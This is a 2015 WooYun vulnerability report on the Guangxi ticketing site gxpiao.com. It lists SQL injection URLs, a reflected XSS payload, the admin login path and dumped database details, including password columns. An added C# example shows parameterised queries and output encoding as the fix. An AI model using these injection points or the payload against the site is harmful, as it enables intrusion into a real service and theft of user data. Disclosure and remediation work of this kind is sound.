
Guangxi Ticketing Network (gxpiao.com): SQL injection + reflected XSS vulnerability; millions of records leaked, a large number of accounts have spendable balances

2015-06-14 08:10

Injection points:

http://www.gxpiao.com/Movie_page1.aspx?dyyid=1

http://www.gxpiao.com/Movie_page2.aspx?dybm=1



[Screenshots: 1.jpg, 2.jpg]





Reflected XSS vulnerability:

http://www.gxpiao.com/Movie_page1.aspx?dyyid="><script>alert(/乌云/)</script>

[Screenshot: 4.jpg]





Admin backend:

http://www.gxpiao.com/manage/login.aspx

Proof of vulnerability:

Dumped columns: merchant name | merchant type | password | privileges | username





Database: gxpwdb

[252 tables]








[Screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg, 5.jpg]

Fix:

Filter the inputs.
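The report does not show the site's code, so the following is an added C# example (the pages are ASP.NET, judging by the .aspx URLs), not gxpiao.com's own source: it shows the "before" pattern that produces both findings in a single parameter and a hardened handling of dyyid. The class, method, table and column names are assumptions.

```csharp
using System.Data;
using System.Data.SqlClient;
using System.Web;

// Added example, not code from gxpiao.com: the report only shows the URLs,
// so the pattern in the "before" comment and every name below are assumptions.
public static class MoviePageHardened
{
    // Before (the pattern the two findings imply): the raw dyyid value is
    // concatenated into SQL and echoed back into HTML unencoded, which gives
    // both the injection and the reflected XSS from one parameter:
    //   string sql = "SELECT * FROM Movies WHERE dyyid=" + Request["dyyid"];
    //   lit.Text   = "<input value=\"" + Request["dyyid"] + "\">";

    // After, step 1: dyyid is an identifier, so accept only a positive integer.
    // The "><script> prefix from the report and any quote-based SQL fail here,
    // before a query is ever built.
    public static bool TryParseMovieId(string raw, out int id)
    {
        id = 0;
        return !string.IsNullOrEmpty(raw) && int.TryParse(raw, out id) && id > 0;
    }

    // After, step 2: bind the typed value as a parameter; the query text never
    // changes, so the database cannot mistake input for SQL.
    public static DataTable LoadMovie(SqlConnection conn, int id)
    {
        const string sql = "SELECT Title, ShowTime FROM Movies WHERE dyyid = @id";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            var result = new DataTable();
            using (SqlDataReader reader = cmd.ExecuteReader())
            {
                result.Load(reader);
            }
            return result;
        }
    }

    // After, step 3: anything reflected into an attribute is attribute-encoded,
    // so a stray " cannot close the attribute even if validation is loosened later.
    public static string RenderIdField(string value)
    {
        return "<input name=\"dyyid\" value=\""
             + HttpUtility.HtmlAttributeEncode(value) + "\" />";
    }
}
```

In Page_Load, a failed TryParseMovieId should end with a 400 response that does not echo the rejected value; Movie_page2.aspx?dybm=1 needs the same treatment with whatever type dybm actually is.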

Source: www.wooyun.org/bugs/wooyun-2015-0110881
